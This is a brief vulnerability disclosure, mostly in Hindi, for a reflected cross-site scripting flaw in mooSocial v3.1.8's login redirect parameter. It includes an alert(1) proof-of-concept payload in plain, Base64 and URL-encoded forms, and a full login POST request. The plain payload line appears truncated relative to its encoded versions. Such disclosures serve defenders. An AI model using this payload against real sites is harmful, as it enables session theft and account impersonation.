
mooSocial v3.1.8 उपयोगकर्ता लॉगिन फ़ंक्शन पर क्रॉस-साइट स्क्रिप्टिंग के लिए असुरक्षित है।
mooSocial v3.1.8 के उपयोगकर्ता लॉगिन फ़ंक्शन में data[redirect_url] पैरामीटर में एक परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है, जो हमलावरों को उपयोगकर्ता के सत्र कुकीज़ चुराने और एक क्राफ्टेड URL के माध्यम से उनके खाते का प्रतिरूपण करने की अनुमति देती है।
भेद्य पैरामीटर: data[redirect_url]
Payload : test">test
Payload (Base64 encoded) : dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
Final Payload (Base64+Url encoded): dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d
POST अनुरोध /moosocial/users/login पर (केवल POST अनुरोध डेटा):
[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]
